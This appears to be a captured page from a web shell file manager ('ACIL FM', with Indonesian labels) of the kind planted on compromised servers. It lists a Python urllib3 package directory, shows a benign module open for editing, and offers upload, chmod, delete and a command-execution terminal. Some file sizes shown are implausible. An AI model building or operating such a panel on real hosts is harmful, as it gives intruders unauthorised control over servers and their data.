ACIL FM
Dark
Refresh
Current DIR:
/lib/python3.9/site-packages/urllib3/contrib
/
lib
python3.9
site-packages
urllib3
contrib
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
_securetransport
-
chmod
Open
Rename
Delete
__pycache__
-
chmod
Open
Rename
Delete
appengine.py
10.75 MB
chmod
View
DL
Edit
Rename
Delete
ntlmpool.py
4.06 MB
chmod
View
DL
Edit
Rename
Delete
pyopenssl.py
16.48 MB
chmod
View
DL
Edit
Rename
Delete
securetransport.py
33.61 MB
chmod
View
DL
Edit
Rename
Delete
socks.py
6.93 MB
chmod
View
DL
Edit
Rename
Delete
_appengine_environ.py
957 B
chmod
View
DL
Edit
Rename
Delete
__init__.py
0 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /lib/python3.9/site-packages/urllib3/contrib/_appengine_environ.py
""" This module provides means to detect the App Engine environment. """ import os def is_appengine(): return is_local_appengine() or is_prod_appengine() def is_appengine_sandbox(): """Reports if the app is running in the first generation sandbox. The second generation runtimes are technically still in a sandbox, but it is much less restrictive, so generally you shouldn't need to check for it. see https://cloud.google.com/appengine/docs/standard/runtimes """ return is_appengine() and os.environ["APPENGINE_RUNTIME"] == "python27" def is_local_appengine(): return "APPENGINE_RUNTIME" in os.environ and os.environ.get( "SERVER_SOFTWARE", "" ).startswith("Development/") def is_prod_appengine(): return "APPENGINE_RUNTIME" in os.environ and os.environ.get( "SERVER_SOFTWARE", "" ).startswith("Google App Engine/") def is_prod_appengine_mvms(): """Deprecated.""" return False
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply